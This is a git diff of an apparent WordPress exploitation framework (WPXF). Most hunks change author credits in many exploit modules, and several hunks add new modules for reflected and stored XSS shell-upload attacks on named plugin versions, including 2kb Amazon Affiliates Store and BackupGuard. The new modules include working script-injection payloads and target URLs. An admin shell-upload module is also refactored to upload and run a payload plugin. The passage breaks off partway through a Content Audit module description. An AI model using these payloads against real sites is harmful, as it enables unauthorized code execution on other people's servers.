             'that of an administrator.',
       author: [
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'rastating' # WPXF module
       ],
       references: [
         ['WPVDB', '8432'],
diff --git a/modules/auxiliary/woocommerce_email_test_order_disclosure.rb b/modules/auxiliary/woocommerce_email_test_order_disclosure.rb
index bf27b9f..c7d1df7 100644
--- a/modules/auxiliary/woocommerce_email_test_order_disclosure.rb
+++ b/modules/auxiliary/woocommerce_email_test_order_disclosure.rb
@@ -13,8 +13,8 @@ def initialize
         users to download a copy of the last order confirmation e-mail sent by the system.
       ),
       author: [
-        'jansass GmbH',                    # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'jansass GmbH', # Disclosure
+        'rastating'     # WPXF module
       ],
       references: [
         ['WPVDB', '8689']
diff --git a/modules/auxiliary/woocommerce_order_import_export_order_disclosure.rb b/modules/auxiliary/woocommerce_order_import_export_order_disclosure.rb
index e87ff4b..f2dc576 100644
--- a/modules/auxiliary/woocommerce_order_import_export_order_disclosure.rb
+++ b/modules/auxiliary/woocommerce_order_import_export_order_disclosure.rb
@@ -11,8 +11,8 @@ def initialize
       desc: 'Version <= 1.0.8 of the import export plugin for WooCommerce allows unauthenticated '\
             'users to download a CSV disclosing information about orders placed in the system.',
       author: [
-        'David Peltier',                   # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'David Peltier', # Disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8624'],
diff --git a/modules/auxiliary/wp_front_end_profile_privilege_escalation.rb b/modules/auxiliary/wp_front_end_profile_privilege_escalation.rb
index a654e7c..14fa9d6 100644
--- a/modules/auxiliary/wp_front_end_profile_privilege_escalation.rb
+++ b/modules/auxiliary/wp_front_end_profile_privilege_escalation.rb
@@ -11,7 +11,7 @@ def initialize
       desc: 'The WP Front End Profile plugin, in versions <= 0.2.1, allows authenticated '\
             'users of any user level to escalate their user role to an administrator.',
       author: [
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'rastating' # WPXF module
       ],
       references: [
         ['WPVDB', '8620']
diff --git a/modules/auxiliary/wp_hide_security_enhancer_file_download.rb b/modules/auxiliary/wp_hide_security_enhancer_file_download.rb
index 45a3c3a..7320fa7 100644
--- a/modules/auxiliary/wp_hide_security_enhancer_file_download.rb
+++ b/modules/auxiliary/wp_hide_security_enhancer_file_download.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'WP Hide & Security Enhancer <= 1.3.9.2 File Download',
       author: [
-        'Julio Potier',                   # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Julio Potier', # Disclosure
+        'rastating'     # WPXF module
       ],
       references: [
         ['WPVDB', '8867'],
diff --git a/modules/auxiliary/wp_marketplace_v2.4_file_download.rb b/modules/auxiliary/wp_marketplace_v2.4_file_download.rb
index a23427b..b5a55a3 100644
--- a/modules/auxiliary/wp_marketplace_v2.4_file_download.rb
+++ b/modules/auxiliary/wp_marketplace_v2.4_file_download.rb
@@ -13,8 +13,8 @@ def initialize
         to download any arbitrary file accessible by the user the web server is running as.
       ),
       author: [
-        'Kacper Szurek',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Kacper Szurek', # Disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '7861'],
diff --git a/modules/auxiliary/wp_v4.7.1_content_injection.rb b/modules/auxiliary/wp_v4.7.1_content_injection.rb
index 6756685..4c0b277 100644
--- a/modules/auxiliary/wp_v4.7.1_content_injection.rb
+++ b/modules/auxiliary/wp_v4.7.1_content_injection.rb
@@ -17,8 +17,8 @@ def initialize
         update the post with the specified content, title and or excerpt.
       ),
       author: [
-        'Sucuri <sucuri.net>',            # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Sucuri <sucuri.net>', # Disclosure
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8734'],
diff --git a/modules/auxiliary/wp_v4.7.2_csrf_dos.rb b/modules/auxiliary/wp_v4.7.2_csrf_dos.rb
index f179523..56e1736 100644
--- a/modules/auxiliary/wp_v4.7.2_csrf_dos.rb
+++ b/modules/auxiliary/wp_v4.7.2_csrf_dos.rb
@@ -14,8 +14,8 @@ def initialize
         administrator visits a malicious URL.
       ),
       author: [
-        'Sipke Mellema',                  # Vulnerability disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Sipke Mellema', # Vulnerability disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8770'],
diff --git a/modules/auxiliary/wp_v4.7_user_info_disclosure.rb b/modules/auxiliary/wp_v4.7_user_info_disclosure.rb
index 155306b..83626fe 100644
--- a/modules/auxiliary/wp_v4.7_user_info_disclosure.rb
+++ b/modules/auxiliary/wp_v4.7_user_info_disclosure.rb
@@ -14,7 +14,7 @@ def initialize
         registering or having an account.
       ),
       author: [
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'rastating' # WPXF module
       ],
       references: [
         ['WPVDB', '8715'],
diff --git a/modules/auxiliary/wp_vault_file_download.rb b/modules/auxiliary/wp_vault_file_download.rb
index 6f9b555..99a4cd0 100644
--- a/modules/auxiliary/wp_vault_file_download.rb
+++ b/modules/auxiliary/wp_vault_file_download.rb
@@ -14,8 +14,8 @@ def initialize
         PHP files.
       ),
       author: [
-        'Lenon Leite',                    # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Lenon Leite', # Disclosure
+        'rastating'    # WPXF module
       ],
       references: [
         ['WPVDB', '8684']
diff --git a/modules/auxiliary/wplms_privilege_escalation.rb b/modules/auxiliary/wplms_privilege_escalation.rb
index 9f532b3..f873616 100644
--- a/modules/auxiliary/wplms_privilege_escalation.rb
+++ b/modules/auxiliary/wplms_privilege_escalation.rb
@@ -24,8 +24,8 @@ def initialize
             'privileges via the default registration page found at '\
             '/wp-login.php?action=register.',
       author: [
-        'Evex',                             # Vulnerability discovery
-        'Rob Carr <rob[at]rastating.com>'   # WPXF module
+        'Evex',     # Vulnerability discovery
+        'rastating' # WPXF module
       ],
       references: [
         ['WPVDB', '7785']
diff --git a/modules/auxiliary/wptf_image_gallery_arbitrary_file_download.rb b/modules/auxiliary/wptf_image_gallery_arbitrary_file_download.rb
index 011e7a9..ba02c5f 100644
--- a/modules/auxiliary/wptf_image_gallery_arbitrary_file_download.rb
+++ b/modules/auxiliary/wptf_image_gallery_arbitrary_file_download.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'WPTF Image Gallery Arbitrary File Download',
       author: [
-        'Larry W. Cashdollar',             # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Larry W. Cashdollar', # Disclosure
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8106'],
diff --git a/modules/exploits/2kb_amazon_affiliates_store_reflected_xss_shell_upload.rb b/modules/exploits/2kb_amazon_affiliates_store_reflected_xss_shell_upload.rb
new file mode 100644
index 0000000..8b4ec6e
--- /dev/null
+++ b/modules/exploits/2kb_amazon_affiliates_store_reflected_xss_shell_upload.rb
@@ -0,0 +1,34 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::TwoKbAmazonAffiliatesStoreReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: '2kb Amazon Affiliates Store <= 2.1.0 Reflected XSS Shell Upload',
+      author: [
+        'rsanchezr', # Dislosure
+        'rastating'  # WPXF module
+      ],
+      references: [
+        ['CVE', '2017-14622'],
+        ['WPVDB', '8918']
+      ],
+      date: 'Sep 20 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_changelog('2kb-amazon-affiliates-store', 'readme.txt', '2.1.1')
+  end
+
+  def xss_payload
+    url_encode("\"><script>#{xss_ascii_encoded_include_script}</script><!--")
+  end
+
+  def url_with_xss
+    "#{wordpress_url_admin_options}?page=kbAmz&kbAction=demo#{xss_payload}"
+  end
+end
diff --git a/modules/exploits/acf_frontend_display_shell_upload.rb b/modules/exploits/acf_frontend_display_shell_upload.rb
index a2c0a97..ec6992c 100644
--- a/modules/exploits/acf_frontend_display_shell_upload.rb
+++ b/modules/exploits/acf_frontend_display_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'ACF Frontend Display <= 2.0.5 Unauthenticated Shell Upload',
       author: [
-        'TCYB3R',                         # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'TCYB3R',    # Discovery and disclosure
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8086'],
diff --git a/modules/exploits/adblock_blocker_shell_upload.rb b/modules/exploits/adblock_blocker_shell_upload.rb
index 31f4522..be2324f 100644
--- a/modules/exploits/adblock_blocker_shell_upload.rb
+++ b/modules/exploits/adblock_blocker_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Adblock Blocker Unauthenticated Shell Upload',
       author: [
-        'White Fir Design',               # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'White Fir Design', # Discovery and disclosure
+        'rastating'         # WPXF module
       ],
       references: [
         ['WPVDB', '8592'],
diff --git a/modules/exploits/admin_custom_login_reflected_xss_shell_upload.rb b/modules/exploits/admin_custom_login_reflected_xss_shell_upload.rb
index 0d02cf3..27768cd 100644
--- a/modules/exploits/admin_custom_login_reflected_xss_shell_upload.rb
+++ b/modules/exploits/admin_custom_login_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Admin Custom Login <= 2.4.7.1 Reflected XSS Shell Upload',
       author: [
-        'Burak Kelebek',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Burak Kelebek', # Disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8759'],
diff --git a/modules/exploits/admin_management_xtended_xss_shell_upload.rb b/modules/exploits/admin_management_xtended_xss_shell_upload.rb
index 8570303..ce54ed4 100644
--- a/modules/exploits/admin_management_xtended_xss_shell_upload.rb
+++ b/modules/exploits/admin_management_xtended_xss_shell_upload.rb
@@ -19,8 +19,8 @@ def initialize
             'create a new admin user and use the new credentials to '\
             'upload and execute a payload when an admin views the page.',
       author: [
-        'Kacper Szurek',                  # Vulnerability discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Kacper Szurek', # Vulnerability discovery
+        'rastating'      # WPXF module
       ],
       references: [
         ['URL', 'http://security.szurek.pl/admin-management-xtended-240-privilege-escalation.html'],
diff --git a/modules/exploits/admin_shell_upload.rb b/modules/exploits/admin_shell_upload.rb
index 86e1fc2..a060336 100644
--- a/modules/exploits/admin_shell_upload.rb
+++ b/modules/exploits/admin_shell_upload.rb
@@ -11,65 +11,37 @@ def initialize
 
     update_info(
       name: 'Admin Shell Upload',
-      desc: 'This module will generate a plugin, pack the payload into it and '\
-            'upload it to a server running WordPress; providing valid admin '\
-            'credentials are used.',
-      author: ['Rob Carr <rob[at]rastating.com>'],
+      desc: %(
+        This module will generate a plugin, pack the payload into it and
+        upload it to a server running WordPress; providing valid admin
+        credentials are used.
+      ),
+      author: [
+        'rastating'
+      ],
       date: 'Feb 21 2015'
     )
-
-    register_options([
-      StringOption.new(
-        name: 'username',
-        desc: 'The WordPress username to authenticate with',
-        required: true
-      ),
-      StringOption.new(
-        name: 'password',
-        desc: 'The WordPress password to authenticate with',
-        required: true
-      )
-    ])
   end
 
-  def username
-    normalized_option_value('username')
-  end
-
-  def password
-    normalized_option_value('password')
+  def check
+    return :vulnerable if wordpress_and_online?
+    :unknown
   end
 
-  def check
-    if wordpress_and_online?
-      return :vulnerable
-    else
-      return :unknown
-    end
+  def requires_authentication
+    true
   end
 
   def run
     return false unless super
 
-    cookie = authenticate_with_wordpress(username, password)
-    return false unless cookie
-
     emit_info 'Uploading payload...'
-    plugin_name = Utility::Text.rand_alpha(10)
-    payload_name = Utility::Text.rand_alpha(10)
-    unless wordpress_upload_payload_plugin(plugin_name, payload_name, cookie)
-      emit_error 'Failed to upload the payload'
-      return false
-    end
-
-    payload_url = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
-    emit_info "Executing the payload at #{payload_url}..."
-    res = execute_get_request(url: payload_url)
-
-    if res && res.code == 200 && !res.body.strip.empty?
-      emit_success "Result: #{res.body}"
-    end
+    res = wordpress_upload_and_execute_payload_plugin(
+      Utility::Text.rand_alpha(10),
+      Utility::Text.rand_alpha(10),
+      session_cookie
+    )
 
-    true
+    !res.nil?
   end
 end
diff --git a/modules/exploits/advanced_custom_fields_remote_file_inclusion.rb b/modules/exploits/advanced_custom_fields_remote_file_inclusion.rb
index a9cdb28..b3d22fe 100644
--- a/modules/exploits/advanced_custom_fields_remote_file_inclusion.rb
+++ b/modules/exploits/advanced_custom_fields_remote_file_inclusion.rb
@@ -15,7 +15,7 @@ def initialize
             'option "allow_url_include" is enabled (disabled by default).',
       author: [
         'Charlie Eriksen <charlie[at]ceriksen.com>', # Vulnerability disclosure
-        'Rob Carr <rob[at]rastating.com>'            # WPXF module
+        'rastating'                                  # WPXF module
       ],
       references: [
         ['URL', 'http://secunia.com/advisories/51037/'],
diff --git a/modules/exploits/affiliatewp_reflected_xss_shell_upload.rb b/modules/exploits/affiliatewp_reflected_xss_shell_upload.rb
index 64c944c..e0729c3 100644
--- a/modules/exploits/affiliatewp_reflected_xss_shell_upload.rb
+++ b/modules/exploits/affiliatewp_reflected_xss_shell_upload.rb
@@ -10,8 +10,8 @@ def initialize
     update_info(
       name: 'AffiliateWP <= 2.0.9 Reflected XSS Shell Upload',
       author: [
-        'DefenseCode',                    # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'DefenseCode', # Discovery
+        'rastating'    # WPXF module
       ],
       references: [
         ['WPVDB', '8835'],
diff --git a/modules/exploits/ajax_random_post_reflected_xss_shell_upload.rb b/modules/exploits/ajax_random_post_reflected_xss_shell_upload.rb
index 14d0b5a..442f90c 100644
--- a/modules/exploits/ajax_random_post_reflected_xss_shell_upload.rb
+++ b/modules/exploits/ajax_random_post_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'AJAX Random Post <= 2.0 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8450'],
diff --git a/modules/exploits/all_in_one_migration_reflected_xss_shell_upload.rb b/modules/exploits/all_in_one_migration_reflected_xss_shell_upload.rb
index bc4ed1f..bfeee50 100644
--- a/modules/exploits/all_in_one_migration_reflected_xss_shell_upload.rb
+++ b/modules/exploits/all_in_one_migration_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'All In One WP Migration <= 6.45 Reflected XSS Shell Upload',
       author: [
-        '0w4ys',                          # Dislosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        '0w4ys',     # Dislosure
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8851']
diff --git a/modules/exploits/all_in_one_schema_rich_snippets_reflected_xss_shell_upload.rb b/modules/exploits/all_in_one_schema_rich_snippets_reflected_xss_shell_upload.rb
index 187665e..70c58e4 100644
--- a/modules/exploits/all_in_one_schema_rich_snippets_reflected_xss_shell_upload.rb
+++ b/modules/exploits/all_in_one_schema_rich_snippets_reflected_xss_shell_upload.rb
@@ -10,8 +10,8 @@ def initialize
     update_info(
       name: 'All In One Schema.org Rich Snippets <= 1.4.4 Reflected XSS Shell Upload',
       author: [
-        'DefenseCode',                    # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'DefenseCode', # Discovery
+        'rastating'    # WPXF module
       ],
       references: [
         ['WPVDB', '8834'],
diff --git a/modules/exploits/all_in_one_seo_pack_xss_shell_upload.rb b/modules/exploits/all_in_one_seo_pack_xss_shell_upload.rb
index 153e645..8b0e09a 100644
--- a/modules/exploits/all_in_one_seo_pack_xss_shell_upload.rb
+++ b/modules/exploits/all_in_one_seo_pack_xss_shell_upload.rb
@@ -16,8 +16,8 @@ def initialize
               and execute a payload when an admin views the blocked bot logs.
             ).strip,
       author: [
-        'David Vaartjes',                 # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'David Vaartjes', # Disclosure
+        'rastating'       # WPXF module
       ],
       references: [
         ['WPVDB', '8538'],
diff --git a/modules/exploits/all_in_one_wp_security_reflected_xss_shell_upload.rb b/modules/exploits/all_in_one_wp_security_reflected_xss_shell_upload.rb
index e99eba3..f991979 100644
--- a/modules/exploits/all_in_one_wp_security_reflected_xss_shell_upload.rb
+++ b/modules/exploits/all_in_one_wp_security_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'All In One WP Security 4.1.4 to 4.1.9 Reflected XSS Shell Upload',
       author: [
-        'Yorick Koster',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Yorick Koster', # Disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8665'],
diff --git a/modules/exploits/alo_easymail_csrf_xss_shell_upload.rb b/modules/exploits/alo_easymail_csrf_xss_shell_upload.rb
index d6b6dc3..c56935d 100644
--- a/modules/exploits/alo_easymail_csrf_xss_shell_upload.rb
+++ b/modules/exploits/alo_easymail_csrf_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'ALO EasyMail Newsletter <= 2.6.01 CSRF XSS Shell Upload',
       author: [
-        'Mohsen Lotfi',                   # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Mohsen Lotfi', # Discovery and disclosure
+        'rastating'     # WPXF module
       ],
       desc: 'This module prepares a payload and link that can be sent '\
             'to an admin user which when visited with a valid session '\
diff --git a/modules/exploits/alpine_photo_tile_for_instagram_reflected_xss_shell_upload.rb b/modules/exploits/alpine_photo_tile_for_instagram_reflected_xss_shell_upload.rb
index 7a97704..931afd0 100644
--- a/modules/exploits/alpine_photo_tile_for_instagram_reflected_xss_shell_upload.rb
+++ b/modules/exploits/alpine_photo_tile_for_instagram_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Alpine PhotoTile for Instagram <= 1.2.7.7 Reflected XSS Shell Upload',
       author: [
-        'Antonis Manaras',                # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Antonis Manaras', # Disclosure
+        'rastating'        # WPXF module
       ],
       references: [
         ['WPVDB', '8754'],
diff --git a/modules/exploits/answer_my_question_reflected_xss_shell_upload.rb b/modules/exploits/answer_my_question_reflected_xss_shell_upload.rb
index 431cd86..8ff46c0 100644
--- a/modules/exploits/answer_my_question_reflected_xss_shell_upload.rb
+++ b/modules/exploits/answer_my_question_reflected_xss_shell_upload.rb
@@ -9,7 +9,7 @@ def initialize
     update_info(
       name: 'Answer My Question <= 1.3 Reflected XSS Shell Upload',
       author: [
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8800']
diff --git a/modules/exploits/anti_plagiarism_reflected_xss_shell_upload.rb b/modules/exploits/anti_plagiarism_reflected_xss_shell_upload.rb
index 758ab56..f19566d 100644
--- a/modules/exploits/anti_plagiarism_reflected_xss_shell_upload.rb
+++ b/modules/exploits/anti_plagiarism_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Anti Plagiarism <= 3.60 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8448'],
diff --git a/modules/exploits/anyvar_reflected_xss_shell_upload.rb b/modules/exploits/anyvar_reflected_xss_shell_upload.rb
index 7f1476b..a9b44f4 100644
--- a/modules/exploits/anyvar_reflected_xss_shell_upload.rb
+++ b/modules/exploits/anyvar_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'AnyVar <= 0.1.1 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Disclosure
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8764'],
diff --git a/modules/exploits/appointment_schedule_booking_system_stored_xss_shell_upload.rb b/modules/exploits/appointment_schedule_booking_system_stored_xss_shell_upload.rb
index d1ab404..779a3f2 100644
--- a/modules/exploits/appointment_schedule_booking_system_stored_xss_shell_upload.rb
+++ b/modules/exploits/appointment_schedule_booking_system_stored_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Appointment Schedule Booking System Unauthenticated Stored XSS Shell Upload',
       author: [
-        'White Fir Design',               # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'White Fir Design', # Disclosure
+        'rastating'         # WPXF module
       ],
       references: [
         ['WPVDB', '8634'],
diff --git a/modules/exploits/arabic_font_csrf_stored_xss_shell_upload.rb b/modules/exploits/arabic_font_csrf_stored_xss_shell_upload.rb
index b5e7064..b4c0384 100644
--- a/modules/exploits/arabic_font_csrf_stored_xss_shell_upload.rb
+++ b/modules/exploits/arabic_font_csrf_stored_xss_shell_upload.rb
@@ -9,7 +9,7 @@ def initialize
     update_info(
       name: 'Arabic Font <= 1.2 CSRF Stored XSS Shell Upload',
       author: [
-        'Rob Carr <rob[at]rastating.com>' # Discovery + WPXF module
+        'rastating'  # Discovery + WPXF module
       ],
       references: [
         ['WPVDB', '8868'],
diff --git a/modules/exploits/atahualpa_reflected_xss_shell_upload.rb b/modules/exploits/atahualpa_reflected_xss_shell_upload.rb
index 8d0889c..a3d6578 100644
--- a/modules/exploits/atahualpa_reflected_xss_shell_upload.rb
+++ b/modules/exploits/atahualpa_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Atahualpa Reflected XSS Shell Upload',
       author: [
-        'Spyros Gasteratos',              # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Spyros Gasteratos', # Disclosure
+        'rastating'          # WPXF module
       ],
       references: [
         ['WPVDB', '8748'],
diff --git a/modules/exploits/backup_guard_reflected_xss_shell_upload.rb b/modules/exploits/backup_guard_reflected_xss_shell_upload.rb
new file mode 100644
index 0000000..bfb11e2
--- /dev/null
+++ b/modules/exploits/backup_guard_reflected_xss_shell_upload.rb
@@ -0,0 +1,34 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::BackupGuardReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'BackupGuard <= 1.1.46 Reflected XSS Shell Upload',
+      author: [
+        'Chris Liu', # Dislosure
+        'rastating'  # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8894'],
+        ['URL', 'https://jvn.jp/en/jp/JVN58559719/index.html']
+      ],
+      date: 'Aug 24 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_changelog('backup', 'README.txt', '1.1.47')
+  end
+
+  def xss_payload
+    url_encode("\"><script>#{xss_ascii_encoded_include_script}</script><input type=\"hidden")
+  end
+
+  def url_with_xss
+    "#{wordpress_url_admin_ajax}?param=&backupType=#{xss_payload}&action=backup_guard_modalManualBackup"
+  end
+end
diff --git a/modules/exploits/bws_panel_reflected_xss_shell_upload.rb b/modules/exploits/bws_panel_reflected_xss_shell_upload.rb
index 83339f5..f8bf04f 100644
--- a/modules/exploits/bws_panel_reflected_xss_shell_upload.rb
+++ b/modules/exploits/bws_panel_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Multiple BestWebSoft Plugins Reflected XSS Shell Upload',
       author: [
-        'DefenseCode',                    # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'DefenseCode', # Discovery
+        'rastating'    # WPXF module
       ],
       references: [
         ['WPVDB', '8796'],
diff --git a/modules/exploits/caldera_forms_stored_xss_shell_upload.rb b/modules/exploits/caldera_forms_stored_xss_shell_upload.rb
index bbc65f1..63e2d6c 100644
--- a/modules/exploits/caldera_forms_stored_xss_shell_upload.rb
+++ b/modules/exploits/caldera_forms_stored_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Caldera Forms <= 1.3.5.3 Stored XSS Shell Upload',
       author: [
-        'Jurgen Kloosterman',             # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Jurgen Kloosterman', # Disclosure
+        'rastating'           # WPXF module
       ],
       references: [
         ['WPVDB', '8650'],
diff --git a/modules/exploits/charity_theme_shell_upload.rb b/modules/exploits/charity_theme_shell_upload.rb
index 129829c..1056df1 100644
--- a/modules/exploits/charity_theme_shell_upload.rb
+++ b/modules/exploits/charity_theme_shell_upload.rb
@@ -17,8 +17,8 @@ def initialize
             'subsequently execute PHP scripts in the context of the '\
             'web server.',
       author: [
-        'Divya',                          # Vulnerability disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Divya',     # Vulnerability disclosure
+        'rastating'  # WPXF module
       ],
       references: [
         ['EDB', '36611']
diff --git a/modules/exploits/check_email_reflected_xss_shell_upload.rb b/modules/exploits/check_email_reflected_xss_shell_upload.rb
index 67fb670..88f632f 100644
--- a/modules/exploits/check_email_reflected_xss_shell_upload.rb
+++ b/modules/exploits/check_email_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Check Email < 0.5 Reflected XSS Shell Upload',
       author: [
-        'Antonis Manaras',                # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Antonis Manaras', # Disclosure
+        'rastating'        # WPXF module
       ],
       references: [
         ['WPVDB', '8661'],
diff --git a/modules/exploits/claptastic_clap_button_reflected_xss_shell_upload.rb b/modules/exploits/claptastic_clap_button_reflected_xss_shell_upload.rb
index 6529ebe..6049140 100644
--- a/modules/exploits/claptastic_clap_button_reflected_xss_shell_upload.rb
+++ b/modules/exploits/claptastic_clap_button_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Claptastic clap! Button <= 1.3 Reflected XSS Shell Upload',
       author: [
-        'Sachin Wagh',                    # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Sachin Wagh', # Disclosure
+        'rastating'    # WPXF module
       ],
       references: [
         ['WPVDB', '8427'],
diff --git a/modules/exploits/code_snippets_reflected_xss_shell_upload.rb b/modules/exploits/code_snippets_reflected_xss_shell_upload.rb
index ac31675..3f71c7e 100644
--- a/modules/exploits/code_snippets_reflected_xss_shell_upload.rb
+++ b/modules/exploits/code_snippets_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Code Snippets <= 2.6.1 Reflected XSS Shell Upload',
       author: [
-        'Burak Kelebek',                  # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Burak Kelebek', # Discovery
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8566'],
diff --git a/modules/exploits/colorway_reflected_xss_shell_upload.rb b/modules/exploits/colorway_reflected_xss_shell_upload.rb
index a34a380..557c917 100644
--- a/modules/exploits/colorway_reflected_xss_shell_upload.rb
+++ b/modules/exploits/colorway_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'ColorWay <= 3.4.1 Reflected XSS Shell Upload',
       author: [
-        'Yorick Koster',                  # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Yorick Koster', # Discovery and disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8568'],
diff --git a/modules/exploits/connections_reflected_xss_shell_upload.rb b/modules/exploits/connections_reflected_xss_shell_upload.rb
index 105f819..7fe0612 100644
--- a/modules/exploits/connections_reflected_xss_shell_upload.rb
+++ b/modules/exploits/connections_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Connections <= 8.5.8 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery and disclosure
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8372'],
diff --git a/modules/exploits/content_audit_csrf_stored_xss_shell_upload.rb b/modules/exploits/content_audit_csrf_stored_xss_shell_upload.rb
new file mode 100644
index 0000000..050bb06
--- /dev/null
+++ b/modules/exploits/content_audit_csrf_stored_xss_shell_upload.rb
@@ -0,0 +1,83 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::ContentAuditCsrfStoredXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Content Audit <= 1.9.1 CSRF Stored XSS Shell Upload',
+      desc: %(
+        Versions up to and including 1.9.1 of the Content Audit plugin suffer
+        from a CSRF and encoding issue, allowing for a JavaScript payload to
+        be stored in the notes against a page.
+
+        This module will create a link, which when clicked by an admin, will
+        store the payload against all auditable items with an ID in the specified
+        range. By default, Content Audit ships with only pages audited, but posts
+        can also be audited. The payload will be executed the next time an admin
+        views the page / post management area, with one of the infected items
+        visible in the list.
+
+        Note: If a specified post ID has not been yet assigned a post / page, the
